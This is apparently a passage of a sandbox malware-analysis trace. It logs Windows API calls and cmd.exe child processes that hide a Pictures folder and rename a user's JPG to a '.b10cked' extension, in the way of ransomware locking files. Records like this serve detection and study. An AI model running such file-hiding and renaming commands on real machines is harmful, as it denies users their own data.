hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f53c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\"", lpProcessInformation=0x18f53c*(hProcess=0x50, hThread=0x4c, dwProcessId=0xad0, dwThreadId=0x988)) returned 1 [0145.561] CloseHandle (hObject=0x4c) returned 1 [0145.561] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0145.561] GetEnvironmentStringsW () returned 0x343760* [0145.561] FreeEnvironmentStringsW (penv=0x343760) returned 1 [0145.561] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0145.777] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x18f430 | out: lpExitCode=0x18f430*=0x0) returned 1 [0145.777] CloseHandle (hObject=0x50) returned 1 [0145.777] _vsnwprintf (in: _Buffer=0x18f578, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f43c | out: _Buffer="00000000") returned 8 [0145.777] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0145.777] GetEnvironmentStringsW () returned 0x343760* [0145.777] FreeEnvironmentStringsW (penv=0x343760) returned 1 [0145.777] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0145.777] GetEnvironmentStringsW () returned 0x343760* [0145.777] FreeEnvironmentStringsW (penv=0x343760) returned 1 [0145.777] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f494 | out: lpAttributeList=0x18f494) [0145.777] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.777] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0145.777] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.777] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0145.778] _get_osfhandle (_FileHandle=0) returned 0x3 [0145.778] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0145.778] SetConsoleInputExeNameW () returned 0x1 [0145.778] GetConsoleOutputCP () returned 0x1b5 [0145.778] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0145.778] SetThreadUILanguage (LangId=0x0) returned 0x409 [0145.778] exit (_Code=0) Process: id = "198" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d80" os_pid = "0x9c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17180 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17181 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17182 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17183 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 17184 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 17185 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17186 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17187 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17188 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 17189 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17292 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17293 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17294 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17295 start_va = 0x4a0000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 17296 start_va = 0x760000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 17297 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 17298 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17299 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17300 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17301 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17302 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17303 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17304 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17305 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17306 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 17307 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17308 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 17309 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 17310 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 17311 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 17312 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 17313 start_va = 0x310000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 17314 start_va = 0x5a0000 end_va = 0x702fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 17315 start_va = 0x770000 end_va = 0x136ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Thread: id = 253 os_tid = 0x9b8 [0144.945] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fb5c | out: lpSystemTimeAsFileTime=0x30fb5c*(dwLowDateTime=0x90533d60, dwHighDateTime=0x1d440a9)) [0144.945] GetCurrentProcessId () returned 0x9c0 [0144.945] GetCurrentThreadId () returned 0x9b8 [0144.945] GetTickCount () returned 0x2d316 [0144.945] QueryPerformanceCounter (in: lpPerformanceCount=0x30fb54 | out: lpPerformanceCount=0x30fb54*=20173391033) returned 1 [0144.945] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0144.945] __set_app_type (_Type=0x1) [0144.945] __p__fmode () returned 0x76b331f4 [0144.945] __p__commode () returned 0x76b331fc [0144.945] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0144.946] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0144.946] GetCurrentThreadId () returned 0x9b8 [0144.946] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9b8) returned 0x38 [0144.946] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0144.946] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0144.946] SetThreadUILanguage (LangId=0x0) returned 0x409 [0144.946] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0144.946] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30faec | out: phkResult=0x30faec*=0x0) returned 0x2 [0144.946] VirtualQuery (in: lpAddress=0x30fb23, lpBuffer=0x30fabc, dwLength=0x1c | out: lpBuffer=0x30fabc*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.946] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fabc, dwLength=0x1c | out: lpBuffer=0x30fabc*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0144.946] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fabc, dwLength=0x1c | out: lpBuffer=0x30fabc*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0144.946] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fabc, dwLength=0x1c | out: lpBuffer=0x30fabc*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.946] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fabc, dwLength=0x1c | out: lpBuffer=0x30fabc*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0144.946] GetConsoleOutputCP () returned 0x1b5 [0144.946] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0144.946] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0144.946] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.946] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0144.947] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.947] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0144.947] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.947] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0144.947] _get_osfhandle (_FileHandle=0) returned 0x3 [0144.947] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0144.947] _get_osfhandle (_FileHandle=0) returned 0x3 [0144.947] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0144.947] GetEnvironmentStringsW () returned 0x4b01b0* [0144.947] FreeEnvironmentStringsW (penv=0x4b01b0) returned 1 [0144.947] GetEnvironmentStringsW () returned 0x4b01b0* [0144.948] FreeEnvironmentStringsW (penv=0x4b01b0) returned 1 [0144.948] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ea5c | out: phkResult=0x30ea5c*=0x40) returned 0x0 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x0, lpData=0x30ea68*=0xe8, lpcbData=0x30ea60*=0x1000) returned 0x2 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x4, lpData=0x30ea68*=0x1, lpcbData=0x30ea60*=0x4) returned 0x0 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x0, lpData=0x30ea68*=0x1, lpcbData=0x30ea60*=0x1000) returned 0x2 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x4, lpData=0x30ea68*=0x0, lpcbData=0x30ea60*=0x4) returned 0x0 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x4, lpData=0x30ea68*=0x40, lpcbData=0x30ea60*=0x4) returned 0x0 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x4, lpData=0x30ea68*=0x40, lpcbData=0x30ea60*=0x4) returned 0x0 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x0, lpData=0x30ea68*=0x40, lpcbData=0x30ea60*=0x1000) returned 0x2 [0144.948] RegCloseKey (hKey=0x40) returned 0x0 [0144.948] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ea5c | out: phkResult=0x30ea5c*=0x40) returned 0x0 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x0, lpData=0x30ea68*=0x40, lpcbData=0x30ea60*=0x1000) returned 0x2 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x4, lpData=0x30ea68*=0x1, lpcbData=0x30ea60*=0x4) returned 0x0 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x0, lpData=0x30ea68*=0x1, lpcbData=0x30ea60*=0x1000) returned 0x2 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x4, lpData=0x30ea68*=0x0, lpcbData=0x30ea60*=0x4) returned 0x0 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x4, lpData=0x30ea68*=0x9, lpcbData=0x30ea60*=0x4) returned 0x0 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x4, lpData=0x30ea68*=0x9, lpcbData=0x30ea60*=0x4) returned 0x0 [0144.948] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ea64, lpData=0x30ea68, lpcbData=0x30ea60*=0x1000 | out: lpType=0x30ea64*=0x0, lpData=0x30ea68*=0x9, lpcbData=0x30ea60*=0x1000) returned 0x2 [0144.948] RegCloseKey (hKey=0x40) returned 0x0 [0144.948] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886373 [0144.948] srand (_Seed=0x5b886373) [0144.948] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg.b10cked\"" [0144.948] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg.b10cked\"" [0144.949] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.949] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4b1910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0144.949] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0144.949] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0144.949] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0144.949] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0144.949] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0144.949] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0144.949] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0144.949] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0144.949] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0144.949] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0144.949] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0144.949] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0144.949] GetEnvironmentStringsW () returned 0x4b2300* [0144.949] FreeEnvironmentStringsW (penv=0x4b2300) returned 1 [0144.949] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.950] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0144.950] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0144.950] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0144.950] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0144.950] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0144.950] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0144.950] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0144.950] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0144.950] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0144.950] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f828 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.950] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f828, lpFilePart=0x30f824 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f824*="Desktop") returned 0x18 [0144.950] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0144.950] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f5a4 | out: lpFindFileData=0x30f5a4) returned 0x4b0040 [0144.950] FindClose (in: hFindFile=0x4b0040 | out: hFindFile=0x4b0040) returned 1 [0144.950] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f5a4 | out: lpFindFileData=0x30f5a4) returned 0x4b0040 [0144.950] FindClose (in: hFindFile=0x4b0040 | out: hFindFile=0x4b0040) returned 1 [0144.950] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f5a4 | out: lpFindFileData=0x30f5a4) returned 0x4b0040 [0144.950] FindClose (in: hFindFile=0x4b0040 | out: hFindFile=0x4b0040) returned 1 [0144.951] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0144.951] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0144.951] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0144.951] GetEnvironmentStringsW () returned 0x4b2b20* [0144.951] FreeEnvironmentStringsW (penv=0x4b2b20) returned 1 [0144.951] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.951] GetConsoleOutputCP () returned 0x1b5 [0144.951] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0144.951] GetUserDefaultLCID () returned 0x409 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f968, cchData=128 | out: lpLCData="0") returned 2 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f968, cchData=128 | out: lpLCData="0") returned 2 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f968, cchData=128 | out: lpLCData="1") returned 2 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0144.952] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0144.952] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0144.953] GetConsoleTitleW (in: lpConsoleTitle=0x4a0900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.953] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0144.953] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0144.953] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0144.953] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0144.954] _wcsicmp (_String1="move", _String2=")") returned 68 [0144.954] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0144.954] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0144.954] _wcsicmp (_String1="IF", _String2="move") returned -4 [0144.954] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0144.954] _wcsicmp (_String1="REM", _String2="move") returned 5 [0144.954] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0144.957] GetConsoleTitleW (in: lpConsoleTitle=0x30f660, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.957] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0144.957] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0144.957] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0144.957] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0144.957] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0144.957] _wcsicmp (_String1="move", _String2="CD") returned 10 [0144.957] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0144.957] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0144.957] _wcsicmp (_String1="move", _String2="REN") returned -5 [0144.957] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0144.957] _wcsicmp (_String1="move", _String2="SET") returned -6 [0144.957] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0144.957] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0144.957] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0144.957] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0144.957] _wcsicmp (_String1="move", _String2="MD") returned 11 [0144.957] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0144.957] _wcsicmp (_String1="move", _String2="RD") returned -5 [0144.957] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0144.957] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0144.957] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0144.957] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0144.957] 